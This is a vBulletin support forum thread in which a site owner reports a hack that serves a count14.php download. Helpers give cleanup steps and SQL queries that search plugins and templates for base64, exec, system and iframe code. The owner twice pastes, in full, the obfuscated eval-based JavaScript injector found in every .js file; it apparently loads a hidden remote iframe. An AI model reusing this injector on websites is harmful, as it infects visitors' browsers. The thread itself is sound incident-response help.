Announcement

Collapse
No announcement yet.

Do i got hacked?

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • [Forum] Do i got hacked?

    Hi everyone. I want to login into my forum and am getting an error:

    Unable to add cookies, header already sent.
    File: /home/xxxx/public_html/includes/functions_login.php
    Line: 526

    After this there comes a file to download count14.php

    Help please


  • #2
    Can you get into your admincp?
    -- Web Developer for hire
    ---Online Marketing Tools and Articles

    Comment


    • #3
      No! I got this error. Than when i refresh the page i got this: Warning: Cannot modify header information - headers already sent by (output started at [path]/includes/functions_login.php:526) in [path]/includes/functions.php on line 4116

      Everytime i refresh the page it comes a file to download...

      Comment


      • #4
        please help someone... no one can login into my forum...

        Comment


        • #5
          Disable all your addons via config.php


          Code:
          <?php
          define('DISABLE_HOOKS', true);
          Gentoo Geek

          Comment


          • #6
            Thank you but is the same after i desable all addons.

            Comment


            • #7
              What version of vb 4 are you running, the latest version 4.2.0 doesnt have a line 526 in functions_login.php?

              Did you modify any of your php files?

              Did you make any changes to your usergroups?

              Edit to add, sorry i missed the file dl of count14.php, reupload all your vb php files & secure your site, im guessing you have a security issue in a product, leave them disabled & upgrade all your addons as well.
              Gentoo Geek

              Comment


              • #8
                Malware detected!!!!! How can i remove it? Please

                Comment


                • #9
                  Javascript anomaly behavior detected.
                  Details:
                  [URL="http://sucuri.net/malware/malware-entry-mwanomalysp7"]http://sucuri.net/malware/malware-entry-mwanomalysp7[/URL="http://sucuri.net/malware/malware-entry-mwanomalysp7"]
                  asq=function(){return n[i];};ww=window;ss=String.fromCharCode;try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej= 12;}{try{whwej=~2;}catch(agdsg){whwej=0;}if(whwej){try{document.body++;}catch(bawetawe){if (ww.document){n="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe ,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x6b,0x73,0x69,0x6d,0x6f,0x21,0x3e,0x21,0x65, 0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e, 0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62,0x6e,0x66,0x28,0x2a,0x3c,0xe,0xb,0xe,0xb,0x21 ,0x21,0x21,0x21,0x6b,0x73,0x69,0x6d,0x6f,0x2f,0x74,0x73,0x64,0x21,0x3e,0x21,0x28,0x69,0x75 ,0x75,0x71,0x3b,0x30,0x30,0x7a,0x75,0x6d,0x6a,0x7a,0x78,0x62,0x79,0x2f,0x73,0x76,0x30,0x64 ,0x70,0x76,0x6f,0x75,0x32,0x35,0x2f,0x71,0x69,0x71,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0 x6b,0x73,0x69,0x6d,0x6f,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x71,0x70,0x74,0x6a,0x75,0x6a,0 x70,0x6f,0x21,0x3e,0x21,0x28,0x62,0x63,0x74,0x70,0x6d,0x76,0x75,0x66,0x28,0x3c,0xe,0xb,0x2 1,0x21,0x21,0x21,0x6b,0x73,0x69,0x6d,0x6f,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x63,0x70,0x7 3,0x65,0x66,0x73,0x21,0x3e,0x21,0x28,0x31,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x6b,0x73, 0x69,0x6d,0x6f,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x69,0x66,0x6a,0x68,0x69,0x75,0x21,0x3e, 0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x6b,0x73,0x69,0x6d,0x6f,0x 2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x78,0x6a,0x65,0x75,0x69,0x21,0x3e,0x21,0x28,0x32,0x71,0x 79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x6b,0x73,0x69,0x6d,0x6f,0x2f,0x74,0x75,0x7a,0x6d ,0x66,0x2f,0x6d,0x66,0x67,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0 x21,0x21,0x21,0x6b,0x73,0x69,0x6d,0x6f,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x75,0x70,0x71,0 x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x6a,0x67, 0x21,0x29,0x22,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66, 0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x6b,0x73,0x69,0x6d,0x6f,0x28,0x2a,0x2a, 0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x 6f,0x75,0x2f,0x78,0x73,0x6a,0x75,0x66,0x29,0x28,0x3d,0x65,0x6a,0x77,0x21,0x6a,0x65,0x3e,0x 5d,0x28,0x6b,0x73,0x69,0x6d,0x6f,0x5d,0x28,0x3f,0x3d,0x30,0x65,0x6a,0x77,0x3f,0x28,0x2a,0x 3c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75 ,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x6b ,0x73,0x69,0x6d,0x6f,0x28,0x2a,0x2f,0x62,0x71,0x71,0x66,0x6f,0x65,0x44,0x69,0x6a,0x6d,0x65 ,0x29,0x6b,0x73,0x69,0x6d,0x6f,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x7e,0xe,0xb,0x7e,0x2 a,0x29,0x2a,0x3c".split(",");h=2;s="";for(i=0;i-492!=0;i++){k=i;s=s.concat(ss(eval(asq())-1));}z=s;eval(""+s);}}}}






                  How to remove it help someone please

                  Comment


                  • #10
                    To check a site for compromises follow these steps:

                    1) Run Suspect File Diagnostics under Maintenance -> Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can't identify as belonging to your addons.
                    2) Check the config.php for any suspicious code. It isn't checked by the suspect file diagnostic.
                    3) Search all templates for iframe tags. They should only appear in the following templates: bbcode_video, editor-ie.css, member.css, stylegenerator.css, vbcms.css, vbulletin.css, help_bbcodes, humanverify_recaptcha, search_common, and search_common_select_type
                    4) Check all your plugins for rogue include, require, include_once, or require_once code. All files should come from your server and be known to you. See step #7
                    5) Check your plugins for any base64 code. I recommend using against using any plugins or products that include base64 code in them. However some "lite" or branded addons will include this as a means to prevent you from cheating the author. You'll have to make a personal call on these if you use them. This is often a sign of a hacked site.
                    6) Make sure that your plugins do not include calls to exec(), system(), or pass_thru() or iframes. These are also often signs of a hacked site.
                    The following query can be run in phpMyAdmin and will provide results for steps 5 and 6 -
                    SELECT title, phpcode, hookname, product FROM plugin WHERE phpcode LIKE '%base64%' OR phpcode LIKE '%exec%' OR phpcode LIKE '%system%' OR phpcode like '%pass_thru%' OR phpcode like '%iframe%';
                    If you a plugin that you can't read or the code is obfuscated then you should probably contact the addon author. If it is assigned to the vBulletin, vBulletin CMS, vBulletin Blog or Skimlink products, delete it.
                    7) Using PHPMyAdmin run this query: SELECT styleid, title, template FROM template WHERE template LIKE '%base64%' OR template LIKE '%exec%' OR template LIKE '%system%' OR template like '%pass_thru%' OR template like '%iframe%';
                    It checks the templates for compromising code. You will need to review the results from this. If you can't read it or the code is obfuscated then you should revert the template in the Admin CP.
                    8) Check .htaccess to make sure there are no redirects there.
                    9) Check all plugins in reference to cache or cookies. If they are similar to any of the above, delete them.


                    Former vBulletin Support Staff
                    Need Help?, Or P.M. Me

                    Comment


                    • #11
                      I think Alimadkour said it all!

                      If your still in distress consider purchasing sucuri.net, they will help you clean the site and get you going again.

                      Comment


                      • #12
                        What version do you have? There are also a few articles floating around on how to clean up a forum hacked by this type of hack. A little search should find them.

                        Comment


                        • #13
                          Please check securi http://goo.gl/LRVaB

                          I cant find those files in my ftp

                          Comment


                          • #14
                            I got this code at ALL my .js files :



                            /*ded509*/
                            asq=function(){return n[i];};ww=window;ss=String.fromCharCode;try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej= 12;}{try{whwej=~2;}catch(agdsg){whwej=0;}if(whwej){try{document.body++;}catch(bawetawe){if (ww.document){n="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe ,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x6b,0x73,0x69,0x6d,0x6f,0x21,0x3e,0x21,0x65, 0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e, 0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62,0x6e,0x66,0x28,0x2a,0x3c,0xe,0xb,0xe,0xb,0x21 ,0x21,0x21,0x21,0x6b,0x73,0x69,0x6d,0x6f,0x2f,0x74,0x73,0x64,0x21,0x3e,0x21,0x28,0x69,0x75 ,0x75,0x71,0x3b,0x30,0x30,0x7a,0x75,0x6d,0x6a,0x7a,0x78,0x62,0x79,0x2f,0x73,0x76,0x30,0x64 ,0x70,0x76,0x6f,0x75,0x32,0x35,0x2f,0x71,0x69,0x71,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0 x6b,0x73,0x69,0x6d,0x6f,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x71,0x70,0x74,0x6a,0x75,0x6a,0 x70,0x6f,0x21,0x3e,0x21,0x28,0x62,0x63,0x74,0x70,0x6d,0x76,0x75,0x66,0x28,0x3c,0xe,0xb,0x2 1,0x21,0x21,0x21,0x6b,0x73,0x69,0x6d,0x6f,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x63,0x70,0x7 3,0x65,0x66,0x73,0x21,0x3e,0x21,0x28,0x31,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x6b,0x73, 0x69,0x6d,0x6f,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x69,0x66,0x6a,0x68,0x69,0x75,0x21,0x3e, 0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x6b,0x73,0x69,0x6d,0x6f,0x 2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x78,0x6a,0x65,0x75,0x69,0x21,0x3e,0x21,0x28,0x32,0x71,0x 79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x6b,0x73,0x69,0x6d,0x6f,0x2f,0x74,0x75,0x7a,0x6d ,0x66,0x2f,0x6d,0x66,0x67,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0 x21,0x21,0x21,0x6b,0x73,0x69,0x6d,0x6f,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x75,0x70,0x71,0 x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x6a,0x67, 0x21,0x29,0x22,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66, 0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x6b,0x73,0x69,0x6d,0x6f,0x28,0x2a,0x2a, 0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x 6f,0x75,0x2f,0x78,0x73,0x6a,0x75,0x66,0x29,0x28,0x3d,0x65,0x6a,0x77,0x21,0x6a,0x65,0x3e,0x 5d,0x28,0x6b,0x73,0x69,0x6d,0x6f,0x5d,0x28,0x3f,0x3d,0x30,0x65,0x6a,0x77,0x3f,0x28,0x2a,0x 3c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75 ,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x6b ,0x73,0x69,0x6d,0x6f,0x28,0x2a,0x2f,0x62,0x71,0x71,0x66,0x6f,0x65,0x44,0x69,0x6a,0x6d,0x65 ,0x29,0x6b,0x73,0x69,0x6d,0x6f,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x7e,0xe,0xb,0x7e,0x2 a,0x29,0x2a,0x3c".split(",");h=2;s="";for(i=0;i-492!=0;i++){k=i;s=s.concat(ss(eval(asq())-1));}z=s;eval(""+s);}}}}
                            /*/ded509*/


                            Is there a option to delete this code at all .js files without to edit 1000`s of files?

                            Comment


                            • #15
                              Originally posted by tim.liton View Post
                              Is there a option to delete this code at all .js files without to edit 1000`s of files?
                              You could upload the original vBulletin files by overwriting the infected files. Please make sure that you worked with the list that Ali provided earlier, then also go and change all passwords (FTP, cPanel, etc) just for the worst case.
                              No private support, only PM me when I ask for it. Support in the forums only.

                              Comment

                              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                              Working...
                              X